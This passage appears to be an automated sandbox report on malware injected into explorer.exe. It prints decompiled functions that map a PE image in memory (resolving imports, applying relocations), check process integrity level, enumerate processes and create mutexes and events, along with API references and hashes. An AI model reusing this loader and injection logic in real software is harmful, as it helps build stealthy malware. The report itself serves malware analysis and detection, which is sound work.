							while( *_v68 != 0) {
								if(( *_v68 & _v64) == 0) {
									_v80 =  *_v68 + _a4;
									_v84 = GetProcAddress(_v72, _v80 + 2);
								} else {
									_v84 = GetProcAddress(_v72,  *_v68 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v76 + 0x10)) == 0) {
									 *_v68 = _v84;
								} else {
									 *( *((intOrPtr*)(_v76 + 0x10)) + _a4 + _v60) = _v84;
								}
								_v68 =  &(_v68[1]);
								_v60 = _v60 + 4;
							}
							_v76 = _v76 + 0x14;
							continue;
						} else {
							return 0xfffffffd;
						}
					}
					goto L35;
				}
				_v24 = _a4 +  *((intOrPtr*)(_v16 + 0xa0));
				_v28 =  *((intOrPtr*)(_v16 + 0xa4));
				while(0 != 0) {
				}
				while(_v28 > 0) {
					_v40 = _v24[2];
					_v28 = _v28 - _v40;
					_v40 = _v40 - 8;
					_v40 = _v40 >> 1;
					_v32 =  &(_v24[4]);
					_v36 = _a4 +  *_v24;
					_v44 = _v40;
					while(1) {
						_v44 = _v44 - 1;
						if(_v44 == 0) {
							break;
						}
						_v53 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v52 =  *_v32 & 0xfff;
						_v48 = (_v52 & 0x0000ffff) + _v36;
						if((_v53 & 0x000000ff) != 3) {
							if((_v53 & 0x000000ff) == 0xa) {
								 *_v48 =  *_v48 + _v12;
							}
						} else {
							 *_v48 =  *_v48 + _v12;
						}
						_v32 =  &(_v32[1]);
					}
					_v24 = _v32;
				}
				goto L13;
			}

0x003f6bbf
0x003f6bc5
0x003f6bce
0x003f6bd1
0x003f6bd4
0x00000000
0x003f6cbb
0x003f6cbf
0x003f6ccb
0x003f6ded
0x003f6df6
0x003f6df9
0x003f6dfd
0x003f6e03
0x003f6e0b
0x003f6e0b
0x003f6e13
0x00000000
0x003f6e20
0x003f6cd1
0x003f6ce4
0x003f6ce7
0x003f6d04
0x003f6d0b
0x003f6d17
0x003f6d1d
0x003f6d1d
0x003f6d24
0x003f6d36
0x003f6d4e
0x003f6d38
0x003f6d40
0x003f6d40
0x003f6d51
0x003f6d58
0x003f6d68
0x003f6d8c
0x003f6da0
0x003f6d6a
0x003f6d7f
0x003f6d7f
0x003f6daa
0x003f6dc6
0x003f6dac
0x003f6dbb
0x003f6dbb
0x003f6dce
0x003f6dd7
0x003f6dd7
0x003f6de5
0x00000000
0x003f6d26
0x00000000
0x003f6d26
0x003f6d24
0x00000000
0x003f6ce7
0x003f6be6
0x003f6bf2
0x003f6bf5
0x003f6bf9
0x003f6bfb
0x003f6c0b
0x003f6c14
0x003f6c1d
0x003f6c25
0x003f6c2e
0x003f6c39
0x003f6c3f
0x003f6c42
0x003f6c4b
0x003f6c50
0x00000000
0x00000000
0x003f6c5b
0x003f6c69
0x003f6c74
0x003f6c7e
0x003f6c96
0x003f6ca3
0x003f6ca3
0x003f6c80
0x003f6c8b
0x003f6c8b
0x003f6cab
0x003f6cab
0x003f6cb3
0x003f6cb3
0x00000000

APIs

GetModuleHandleA.KERNEL32(?), ref: 003F6CFE
LoadLibraryA.KERNEL32(?), ref: 003F6D17
GetProcAddress.KERNEL32(00000000,?), ref: 003F6D79
GetProcAddress.KERNEL32(00000000,?), ref: 003F6D9A

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID:
API String ID: 384173800-0
Opcode ID: b9ca34d5ce3fbd14189faae9a977af8b1519fb73ed2535278706064f5de5e774
Instruction ID: 370f49ee742e93e147a660684f1e47dbbc640d9abc825c5c867da37941c67f11
Opcode Fuzzy Hash: b9ca34d5ce3fbd14189faae9a977af8b1519fb73ed2535278706064f5de5e774
Instruction Fuzzy Hash: 79A19174E0020DDFCB19CF98C991AADBBB1FF88304F248169E955AB355C734A982CF94

Uniqueness

Uniqueness Score: 0.99%

Function 0151D9A0, Relevance: 6.1, APIs: 4, Instructions: 93
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 58%

			E0151D9A0(void* _a4) {
				char _v8;
				char _v9;
				void* _v16;
				void** _v20;
				intOrPtr* _v24;
				char* _v28;
				void** _t31;

				_v9 = 0;
				_v20 = 0;
				if(OpenProcessToken(_a4, 8,  &_v16) != 0) {
					_t31 = E0151D6A0(_v16, 0x19,  &_v8); // executed
					_v20 = _t31;
					if(_v20 != 0) {
						_v28 = GetSidSubAuthorityCount( *_v20);
						if(_v28 == 0 || ( *_v28 & 0x000000ff) == 0) {
							while(0 != 0) {
							}
						} else {
							_v24 = GetSidSubAuthority( *_v20, ( *_v28 & 0x000000ff) - 1);
							if(_v24 != 0) {
								if( *_v24 >= 0x2000) {
									if( *_v24 < 0x2000 ||  *_v24 >= 0x3000) {
										if( *_v24 >= 0x3000) {
											_v9 = 3;
										}
									} else {
										_v9 = 2;
									}
								} else {
									_v9 = 1;
								}
								L24:
								if(_v20 != 0) {
									E01513990( &_v20, 0);
								}
								CloseHandle(_v16); // executed
								return _v9;
							}
							while(0 != 0) {
							}
						}
						goto L24;
					}
					while(0 != 0) {
					}
					goto L24;
				}
				L1:
				if(0 == 0) {
					return 0;
				} else {
				}
				goto L1;
			}

0x0151d9a6
0x0151d9aa
0x0151d9c3
0x0151d9dc
0x0151d9e4
0x0151d9eb
0x0151da04
0x0151da0b
0x0151da17
0x0151da1b
0x0151da1f
0x0151da35
0x0151da3c
0x0151da4f
0x0151da60
0x0151da7c
0x0151da7e
0x0151da7e
0x0151da6d
0x0151da6d
0x0151da6d
0x0151da51
0x0151da51
0x0151da51
0x0151da82
0x0151da86
0x0151da8e
0x0151da93
0x0151da9a
0x00000000
0x0151daa0
0x0151da3e
0x0151da42
0x0151da44
0x00000000
0x0151da0b
0x0151d9ed
0x0151d9f1
0x00000000
0x0151d9f3
0x0151d9c5
0x0151d9c7
0x00000000
0x00000000
0x0151d9c9
0x00000000

APIs

OpenProcessToken.ADVAPI32(0151EE89,00000008,?), ref: 0151D9BB
GetSidSubAuthorityCount.ADVAPI32 ref: 0151D9FE
GetSidSubAuthority.ADVAPI32(00000000,-00000001), ref: 0151DA2F
CloseHandle.KERNEL32(?), ref: 0151DA9A

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: Authority$CloseCountHandleOpenProcessToken
String ID:
API String ID: 1786183074-0
Opcode ID: 04211dc86fa49f094909fbebc19dfd5a60cb30fe09e9374b3164b49150c81b61
Instruction ID: 201325cd23f72b251657b7087da5fa6eebbe4d48bbab0ef97b3ba736c24dda5d
Opcode Fuzzy Hash: 04211dc86fa49f094909fbebc19dfd5a60cb30fe09e9374b3164b49150c81b61
Instruction Fuzzy Hash: C4317072908209DBFB16CFE4C84DBBEBBB6BB41205F144459D9116F189D7B58640CBA1

Uniqueness

Uniqueness Score: 0.42%

Function 01514290, Relevance: 6.1, APIs: 4, Instructions: 77
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E01514290(void* __ecx) {
				struct HINSTANCE__* _v8;
				char _v12;
				intOrPtr _v16;
				_Unknown_base(*)()* _v20;
				struct HINSTANCE__* _v24;
				intOrPtr _t21;
				CHAR* _t22;
				struct HINSTANCE__* _t23;
				intOrPtr _t32;
				CHAR* _t38;
				intOrPtr _t39;
				intOrPtr _t41;
				void* _t42;
				void* _t43;

				_t36 = __ecx;
				_v24 = 0;
				_v12 = 0;
				_v8 = 0;
				_v16 = 0;
				_t21 = E01513960(__ecx, 0x100);
				_t43 = _t42 + 4;
				 *0x1538854 = _t21;
				_t22 =  *0x153ac40; // 0x18e0d5a
				_t23 = LoadLibraryA(_t22); // executed
				_v8 = _t23;
				if(_v8 != 0) {
					_t38 =  *0x153abd4; // 0x18e0807
					_v20 = GetProcAddress(_v8, _t38);
					if(_v20 != 0) {
						_t39 =  *0x1538854; // 0x195f9b8
						E01513BA0(_t36, _t39, 0, 0x100);
						_t43 = _t43 + 0xc;
						_v12 = 0xff;
						_t37 =  *0x1538854; // 0x195f9b8
						_v16 = _v20(0, _t37,  &_v12);
						if(_v16 == 0) {
							FreeLibrary(_v8); // executed
							return 0;
						}
						while(0 != 0) {
						}
						_v24 = 0xfffffffd;
						L13:
						if(_v8 != 0) {
							_t37 = _v8;
							FreeLibrary(_v8);
						}
						_t41 =  *0x153ab14; // 0x18e05bc
						_t32 =  *0x1538854; // 0x195f9b8
						E01513D60(_t37, _t32, _t41, 0x100);
						return 0xfffffffe;
					} else {
						goto L5;
					}
					while(1) {
						L5:
						_t37 = 0;
						if(0 == 0) {
							break;
						}
					}
					_v24 = 0xfffffffe;
					goto L13;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t37 = 0;
					if(0 == 0) {
						break;
					}
				}
				_v24 = 0xffffffff;
				goto L13;
			}

0x01514290
0x01514296
0x0151429d
0x015142a4
0x015142ab
0x015142b7
0x015142bc
0x015142bf
0x015142c4
0x015142ca
0x015142d0
0x015142d7
0x015142e8
0x015142f9
0x01514300
0x01514318
0x0151431f
0x01514324
0x01514327
0x01514332
0x0151433e
0x01514345
0x0151435a
0x00000000
0x01514360
0x01514347
0x0151434b
0x0151434d
0x01514364
0x01514368
0x0151436a
0x0151436e
0x0151436e
0x01514379
0x01514380
0x01514386
0x00000000
0x00000000
0x00000000
0x00000000
0x01514302
0x01514302
0x01514302
0x01514304
0x00000000
0x00000000
0x01514306
0x01514308
0x00000000
0x00000000
0x00000000
0x00000000
0x015142d9
0x015142d9
0x015142d9
0x015142db
0x00000000
0x00000000
0x015142dd
0x015142df
0x00000000

APIs

Part of subcall function 01513960: HeapAlloc.KERNEL32(018E0000,00000008,0152C2F8,?,?,01513A10,015150C5,?,?,015150C6,0152C2F8,00000839), ref: 01513971

LoadLibraryA.KERNEL32(018E0D5A), ref: 015142CA
GetProcAddress.KERNEL32(00000000,018E0807), ref: 015142F3
FreeLibrary.KERNEL32(00000000), ref: 0151435A
FreeLibrary.KERNEL32(00000000), ref: 0151436E

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: Library$Free$AddressAllocHeapLoadProc
String ID:
API String ID: 3978381411-0
Opcode ID: 621304ba7e36bafb55d0ac9f6d03456433f66f943d1127a7ad64f1ef24e727a4
Instruction ID: 2513a36bd76a223f8962d490f2d10d7a8ed2dd0253c978ddee1e611e5d913f3c
Opcode Fuzzy Hash: 621304ba7e36bafb55d0ac9f6d03456433f66f943d1127a7ad64f1ef24e727a4
Instruction Fuzzy Hash: 6331A8B1D00209EBEF25DFE4D918BAEB7B4BB44314F144A68E1219F2C8D7745788DB51

Uniqueness

Uniqueness Score: 2.20%

Function 0151B570, Relevance: 6.1, APIs: 4, Instructions: 71UNIQUE

Download Yara Rule

APIs

Process32FirstW.KERNEL32(000000FF,0000022C), ref: 0151B5DE
CloseHandle.KERNEL32(000000FF,000000FF,0000022C), ref: 0151B5F4
Process32NextW.KERNEL32(000000FF,0000022C), ref: 0151B631
CloseHandle.KERNEL32(000000FF,000000FF,0000022C), ref: 0151B647

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: CloseHandleProcess32$FirstNext
String ID:
API String ID: 3618948363-0
Opcode ID: 3eb32fe7cbba08a28922ce60016f8d981d113b72333b6fae09681e20e650a28b
Instruction ID: eb25178780baa824bd9bcec52d13aca10e12806dcf4b0ba09b62c1546395d331
Opcode Fuzzy Hash: 3eb32fe7cbba08a28922ce60016f8d981d113b72333b6fae09681e20e650a28b
Instruction Fuzzy Hash: AD2180719002199BFB32EB78CD8CBAD76B4BB54314F000AD5E51AAE1C8E7789B84CF11

Uniqueness

Uniqueness Score: 100.00%

Function 0151F820, Relevance: 6.0, APIs: 4, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0151F820(void* __ecx, CHAR* _a4) {
				void* _v8;

				_v8 = OpenEventA(2, 0, _a4);
				if(_v8 != 0) {
					if(SetEvent(_v8) != 0) {
						CloseHandle(_v8); // executed
						return 1;
					}
					while(0 != 0) {
					}
					CloseHandle(_v8);
					return 0;
				}
				while(0 != 0) {
				}
				return 0;
			}

0x0151f832
0x0151f839
0x0151f851
0x0151f86b
0x00000000
0x0151f871
0x0151f853
0x0151f857
0x0151f85d
0x00000000
0x0151f863
0x0151f83b
0x0151f83f
0x00000000

APIs

OpenEventA.KERNEL32(00000002,00000000,00000000,?,?,01505A75,?,?,00000020,p%08x,00000000,00000000,?,?,?,01505ADB), ref: 0151F82C
SetEvent.KERNEL32(00000000,?,?,01505A75,?,?,00000020,p%08x,00000000), ref: 0151F849
CloseHandle.KERNEL32(00000000,?,?,01505A75,?,?,00000020,p%08x,00000000), ref: 0151F85D
CloseHandle.KERNEL32(00000000,?,?,01505A75,?,?,00000020,p%08x,00000000), ref: 0151F86B

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$Open
String ID:
API String ID: 2183081999-0
Opcode ID: 6694c3c81b9fd10e6027d0dd7eceb222e876b3e374365c93d2a0281277195184
Instruction ID: 3c78f738b90a17374a24f4c02cd8005de796c7a036c7f3c0f4193d184f70e082
Opcode Fuzzy Hash: 6694c3c81b9fd10e6027d0dd7eceb222e876b3e374365c93d2a0281277195184
Instruction Fuzzy Hash: 11F02B75604214FBE7219BB0C904B3E77B4BB08304F00891AED03DF648D630CD08A760

Uniqueness

Uniqueness Score: 3.75%

Function 01502C4D, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 154
UNIQUE

Download Yara Rule

C-Code - Quality: 83%

			E01502C4D(void* __ecx, void* __edx, void* __eflags, void* __fp0, intOrPtr* _a4) {
				char _v8;
				signed int _v12;
				long _v16;
				intOrPtr _v20;
				void* __edi;
				intOrPtr _t35;
				char _t37;
				long _t38;
				long _t41;
				long _t46;
				intOrPtr _t51;
				long _t52;
				long _t56;
				void* _t60;
				signed int _t61;
				long _t63;
				long _t64;
				long _t65;
				void* _t67;
				void* _t70;
				void* _t71;
				intOrPtr* _t76;
				void* _t77;
				void* _t78;
				void* _t79;
				void* _t82;
				void* _t83;

				_t70 = __edx;
				_t66 = __ecx;
				_v12 = 5;
				_v16 = E01515B10(__ecx, __eflags, 0xa);
				E01515B10(__ecx, __eflags, 0xb);
				_t35 = E01515B10(__ecx, __eflags, 3);
				_t78 = _t77 + 0xc;
				_t85 =  *0x153a748 & 0x00000001;
				_v20 = _t35;
				_v8 = 0;
				if(( *0x153a748 & 0x00000001) != 0) {
					_t61 = E015156D0(_t85, __fp0, 0x15394fc, 0xf, 0x23);
					_t78 = _t78 + 0xc;
					_v12 = _t61;
				}
				_t76 = _a4;
				_push(0);
				_push( *((intOrPtr*)( *((intOrPtr*)(_t76 + 8)))));
				_push( *((intOrPtr*)(_t76 + 4)));
				_push(0x152a360);
				_push( *_t76);
				_t37 = E01516EB0( *0x153ac0c);
				_t79 = _t78 + 0x18;
				_v8 = _t37;
				if(_t37 != 0) {
					_t38 = E01515B10(_t66, __eflags, 0x31);
					_t67 = _t71;
					__eflags = _t38;
					if(_t38 != 0) {
						L12:
						_t63 = _v16;
						__eflags = _t63;
						if(_t63 == 0) {
							_t63 = 0x152a374;
						}
						_t41 = E015095A2(_t67, _t70, 0x1539ec0, __eflags, _v8,  *_t76,  *((intOrPtr*)(_t76 + 4)), 0x1539ec0, _t63,  *0x1535000 & 0x0000ffff,  *0x1535004, E015077B8(_t70), _v20,  *((intOrPtr*)(_t76 + 0xc)), E01502B27); // executed
						_t64 = _t41;
						__eflags = _t64 - 1;
						if(_t64 != 1) {
							__eflags = _t64;
							if(__eflags != 0) {
								if(__eflags >= 0) {
									goto L22;
								}
								_push(1);
								L21:
								_t46 = _v12 * 0x3e8;
								__eflags = _t46;
								SleepEx(_t46, ??);
								goto L22;
							}
							E01502A8E(_t70,  *_t76,  *((intOrPtr*)(_t76 + 4)), 1);
							_push(_t64);
							goto L18;
						} else {
							E01502A8E(_t70,  *_t76,  *((intOrPtr*)(_t76 + 4)), 1);
							_push(1);
							L18:
							E01502A49(_t67);
							L22:
							E01513990( &_v8, 0xffffffff);
							return _t64;
						}
					}
					_t51 =  *((intOrPtr*)(_t76 + 8));
					__eflags =  *(_t51 + 4);
					if( *(_t51 + 4) == 0) {
						goto L12;
					}
					_t52 = E01509720(_t67, _v8,  *_t76,  *((intOrPtr*)(_t76 + 4)), 0x1539ec0,  *((intOrPtr*)(_t76 + 0xc))); // executed
					_t64 = _t52;
					_t82 = _t79 + 0x14;
					__eflags = _t64;
					if(_t64 >= 0) {
						_t65 = _v16;
						__eflags = _t65;
						if(_t65 == 0) {
							_t65 = 0x152a374;
						}
						_t56 = E015097CC(_t67, __eflags, _v8,  *_t76,  *((intOrPtr*)(_t76 + 4)), 0x1539ec0, _t65,  *0x1535000 & 0x0000ffff,  *0x1535004, E015077B8(_t70), _v20,  *((intOrPtr*)( *((intOrPtr*)(_t76 + 8)) + 4)),  *((intOrPtr*)(_t76 + 0xc))); // executed
						_t64 = _t56;
						_t83 = _t82 + 0x2c;
						__eflags = _t64;
						if(_t64 != 0) {
							goto L7;
						} else {
							E01515AF0(0x31, 0x152a378);
							E01515C00(_t67, _t64, "jkfkdm"); // executed
							E0150723D(0x9151, 0xbaba0002); // executed
							_t79 = _t83 + 0x18;
							goto L12;
						}
					}
					L7:
					_push(1);
					goto L21;
				} else {
					_t60 = 0xffffffec;
					return _t60;
				}
			}

0x01502c4d
0x01502c4d
0x01502c57
0x01502c65
0x01502c68
0x01502c6f
0x01502c76
0x01502c79
0x01502c80
0x01502c83
0x01502c86
0x01502c91
0x01502c96
0x01502c99
0x01502c99
0x01502c9c
0x01502ca2
0x01502ca3
0x01502ca5
0x01502ca8
0x01502cad
0x01502cb5
0x01502cba
0x01502cbd
0x01502cc2
0x01502ccf
0x01502cd4
0x01502cda
0x01502cdc
0x01502d7c
0x01502d7c
0x01502d7f
0x01502d81
0x01502d83
0x01502d83
0x01502db1
0x01502db8
0x01502dbe
0x01502dc0
0x01502dd0
0x01502dd2
0x01502dea
0x00000000
0x00000000
0x01502dec
0x01502ded
0x01502df0
0x01502df0
0x01502df7
0x00000000
0x01502df7
0x01502dda
0x01502ddf
0x00000000
0x01502dc2
0x01502dc8
0x01502dcd
0x01502de0
0x01502de0
0x01502dfd
0x01502e03
0x00000000
0x01502e0c
0x01502dc0
0x01502ce2
0x01502ce5
0x01502ce8
0x00000000
0x00000000
0x01502cfa
0x01502cff
0x01502d01
0x01502d04
0x01502d06
0x01502d0f
0x01502d12
0x01502d14
0x01502d16
0x01502d16
0x01502d45
0x01502d4a
0x01502d4c
0x01502d4f
0x01502d51
0x00000000
0x01502d53
0x01502d5a
0x01502d65
0x01502d74
0x01502d79
0x00000000
0x01502d79
0x01502d51
0x01502d08
0x01502d08
0x00000000
0x01502cc4
0x01502cc6
0x00000000
0x01502cc6

APIs

Part of subcall function 015156D0: _ftol2_sse.MSVCRT(?,0151EE43), ref: 01515718

SleepEx.KERNEL32(00000005,00000001), ref: 01502DF7

Strings

jkfkdm, xrefs: 01502D5F
readrr956964, xrefs: 01502CD5, 01502CF1, 01502D3C, 01502DA8

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: Sleep_ftol2_sse
String ID: jkfkdm$readrr956964
API String ID: 3646318427-3193502621
Opcode ID: c691bada59a677e007a3b2fe1128a5b816395466a24be4cd63e35c923d73298b
Instruction ID: b8880a733c4aac2332670a042261e584a18215bf08f2ba388a3e03dc6c040492
Opcode Fuzzy Hash: c691bada59a677e007a3b2fe1128a5b816395466a24be4cd63e35c923d73298b
Instruction Fuzzy Hash: A141F572600207BFDB236FD1CD85E1ABBA9FF95700F004429F6556F1A1E6B29950AB50

Uniqueness

Uniqueness Score: 100.00%

Function 015025DB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94
UNIQUE

Download Yara Rule

C-Code - Quality: 70%

			E015025DB(void* __ecx, void* __esi, intOrPtr* _a4) {
				intOrPtr* _t7;
				int _t8;
				int _t9;
				int _t10;
				int _t11;
				void* _t13;
				int _t14;
				int _t17;
				int _t18;
				int _t19;
				int _t20;
				void* _t21;
				void* _t26;
				void* _t27;
				void* _t29;
				intOrPtr* _t30;
				void* _t36;

				_t29 = __esi;
				_t26 = __ecx;
				_t7 = _a4;
				if(_t7 == 0 ||  *_t7 == 0) {
					_t8 = E01515B10(_t26, __eflags, 6);
					_pop(_t26);
					__eflags = _t8;
					if(_t8 == 0) {
						E01515350(_t26, 0x1dd7);
						_pop(_t26);
					}
				} else {
					E01515AF0(6, _t7);
					E01515C00(_t26, 0, "jkfkdm");
					_t30 = _t30 + 0x10;
				}
				_t9 =  *0x1537914; // 0x1908860
				if(_t9 != 0) {
					_t10 = E01506EF8( *_t9);
					_pop(_t27);
					__eflags = _t10;
					if(_t10 != 0) {
						_t11 = SetEvent( *0x1537900);
						__eflags = _t11;
						if(_t11 != 0) {
							goto L13;
						}
						_push(0xfffffffb);
						goto L9;
					}
					_t14 =  *0x1537914; // 0x1908860
					E0150714F( *((intOrPtr*)(_t14 + 4)));
					 *_t30 = 0x2682;
					_push(0);
					_push( *0x1537904);
					E01513BA0(_t27);
					_t17 =  *0x1537904; // 0x1909e28
					 *(_t17 + 4) =  *(_t17 + 4) | 0xffffffff;
					_t18 = E01506FC0(_t29, __eflags, E015022D8, 0, 0, 1);
					 *0x1537914 = _t18;
					__eflags = _t18;
					if(_t18 != 0) {
						goto L13;
					}
					_push(0xfffffffc);
				} else {
					_t36 =  *0x1537900; // 0x1ec
					if(_t36 != 0) {
						L10:
						_t19 = E01513960(_t26, 0x2682);
						 *0x1537904 = _t19;
						__eflags = _t19;
						if(__eflags != 0) {
							 *(_t19 + 4) =  *(_t19 + 4) | 0xffffffff;
							_t20 = E01506FC0(_t29, __eflags, E015022D8, 0, 0, 1); // executed
							 *0x1537914 = _t20;
							__eflags = _t20;
							if(_t20 == 0) {
								goto L11;
							}
							L13:
							__eflags = 0;
							return 0;
						}
						L11:
						_push(0xfffffffd);
						L9:
						_pop(_t13);
						return _t13;
					}
					_t21 = CreateEventA(0, 0, 0, 0);
					 *0x1537900 = _t21;
					if(_t21 != 0) {
						goto L10;
					}
					_push(0xfffffffe);
				}
			}

0x015025db
0x015025db
0x015025de
0x015025e6
0x01502606
0x0150260b
0x0150260c
0x0150260e
0x01502615
0x0150261a
0x0150261a
0x015025ec
0x015025ef
0x015025fa
0x015025ff
0x015025ff
0x0150261b
0x01502622
0x01502681
0x01502686
0x01502687
0x01502689
0x015026db
0x015026e1
0x015026e3
0x00000000
0x00000000
0x015026e5
0x00000000
0x015026e5
0x0150268b
0x01502693
0x01502698
0x0150269f
0x015026a0
0x015026a6
0x015026ab
0x015026b0
0x015026bd
0x015026c5
0x015026ca
0x015026cc
0x00000000
0x00000000
0x015026ce
0x01502624
0x01502624
0x0150262a
0x01502644
0x01502649
0x0150264f
0x01502654
0x01502656
0x0150265c
0x01502669
0x01502671
0x01502676
0x01502678
0x00000000
0x00000000
0x0150267a
0x0150267a
0x00000000
0x0150267a
0x01502658
0x01502658
0x01502641
0x01502641
0x00000000
0x01502641
0x01502630
0x01502636
0x0150263d
0x00000000
0x00000000
0x0150263f
0x0150263f

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 01502630
SetEvent.KERNEL32 ref: 015026DB

Strings

jkfkdm, xrefs: 015025F4

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: Event$Create
String ID: jkfkdm
API String ID: 1287507382-2652042395
Opcode ID: 46c1741809597b4fcefe6f16e784e80999d2692140a05a7be50700488df6064f
Instruction ID: 11c7341f36fe929ed2a4dde7afaf083111528ee5ced1dfcad4ed295e2cf4f0ad
Opcode Fuzzy Hash: 46c1741809597b4fcefe6f16e784e80999d2692140a05a7be50700488df6064f
Instruction Fuzzy Hash: 2E217EF2514207AEE7233FECADC9D293A88B755228F110B69F526DF2E5DF2048548711

Uniqueness

Uniqueness Score: 100.00%

Function 01502E13, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69
synchronizationUNIQUE

Download Yara Rule

C-Code - Quality: 77%

			E01502E13() {
				signed int _v8;
				void* __ecx;
				signed int _t3;
				signed int _t4;
				intOrPtr _t8;
				intOrPtr _t9;
				intOrPtr _t10;
				void* _t12;
				void* _t13;
				void* _t14;

				_push(_t12);
				_t3 = CreateMutexA(0, 0, 0); // executed
				 *0x153791c = _t3;
				if(_t3 != 0) {
					_t3 = CreateMutexA(0, 0, 0); // executed
					 *0x1537918 = _t3;
					if(_t3 == 0) {
						goto L1;
					} else {
						_t3 = E01515350(_t12, 0x2911);
						_pop(_t13);
						_v8 = _t3;
						if(_t3 == 0) {
							goto L1;
						} else {
							 *0x1537948 = E01516C30(_t13, _t3, 0);
							E01515460( &_v8);
							_t8 = E01513960(_t13, 0x100);
							 *0x1537920 = _t8;
							if(_t8 != 0) {
								_t9 = E01513960(_t13, 8);
								_pop(_t14);
								 *0x153793c = _t9;
								if(_t9 != 0) {
									 *0x1537950 = 0;
									 *0x1537954 = 0;
									_t10 = E01513960(_t14, 0x401);
									 *0x1537924 = _t10;
									if(_t10 != 0) {
										E015088E9();
										_t4 = 0;
									} else {
										_push(0xfffffffc);
										goto L6;
									}
								} else {
									_push(0xfffffffd);
									goto L6;
								}
							} else {
								_push(0xfffffffe);
								L6:
								_pop(_t4);
							}
						}
					}
				} else {
					L1:
					_t4 = _t3 | 0xffffffff;
				}
				return _t4;
			}

0x01502e16
0x01502e24
0x01502e26
0x01502e2d
0x01502e3a
0x01502e3c
0x01502e43
0x00000000
0x01502e45
0x01502e4a
0x01502e4f
0x01502e50
0x01502e55
0x00000000
0x01502e57
0x01502e5e
0x01502e67
0x01502e71
0x01502e79
0x01502e80
0x01502e89
0x01502e8e
0x01502e8f
0x01502e96
0x01502ea1
0x01502ea7
0x01502ead
0x01502eb3
0x01502eba
0x01502ec0
0x01502ec5
0x01502ebc
0x01502ebc
0x00000000
0x01502ebc
0x01502e98
0x01502e98
0x00000000
0x01502e98
0x01502e82
0x01502e82
0x01502e84
0x01502e84
0x01502e84
0x01502e80
0x01502e55
0x01502e2f
0x01502e2f
0x01502e2f
0x01502e2f
0x01502eca

APIs

CreateMutexA.KERNEL32(00000000,00000000,00000000,?,jkfkdm,?,?,015065D2), ref: 01502E24
CreateMutexA.KERNEL32(00000000,00000000,00000000,?,jkfkdm,?,?,015065D2), ref: 01502E3A

Strings

jkfkdm, xrefs: 01502E17

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: CreateMutex
String ID: jkfkdm
API String ID: 1964310414-2652042395
Opcode ID: b6d8da53cb0261237cfb1dc9a5fa1cf967fdf24d0e3b2bf9df45cceb019865b0
Instruction ID: aac99358acd853a650893096d5d3ecf20b76ccccd78edc6eb24aaa5fd1ffe7d9
Opcode Fuzzy Hash: b6d8da53cb0261237cfb1dc9a5fa1cf967fdf24d0e3b2bf9df45cceb019865b0
Instruction Fuzzy Hash: C7112EB29461366DD6337BF96C0886F7E98FB89770F210B16E029DF2C8D770450496E4

Uniqueness

Uniqueness Score: 100.00%

Function 01503F7B, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68
stringUNIQUE

Download Yara Rule

C-Code - Quality: 88%

			E01503F7B(void* __ebx) {
				CHAR* _v8;
				CHAR* _v12;
				void* __ecx;
				signed int _t17;
				signed int _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr _t25;
				void* _t30;
				void* _t33;
				void* _t35;
				void* _t36;
				void* _t37;
				signed int _t38;
				CHAR* _t42;
				void* _t44;

				_push(_t35);
				_push(_t35);
				_t38 =  *0x153795c; // 0x9
				_t39 = _t38 * 0x64;
				_t42 = 0;
				_v8 = 0;
				_t17 = E01513960(_t35, _t38 * 0x64);
				_t36 = _t37;
				_v8 = _t17;
				if(_t17 != 0) {
					_v12 = 0;
					__eflags =  *0x153795c - _t42; // 0x9
					if(__eflags > 0) {
						_t33 = 0;
						__eflags = 0;
						do {
							_t23 =  *0x1537958; // 0x1909d00
							__eflags =  *((intOrPtr*)(_t33 + _t23));
							if( *((intOrPtr*)(_t33 + _t23)) != 0) {
								__eflags = _t42;
								if(_t42 != 0) {
									lstrcatA(_v8, "|");
									_t42 = _t42 + 1;
									__eflags = _t42;
								}
								_t25 =  *0x1537958; // 0x1909d00
								_push( *((intOrPtr*)(_t25 + _t33 + 0x10)));
								_push( *((intOrPtr*)(_t25 + _t33 + 8)));
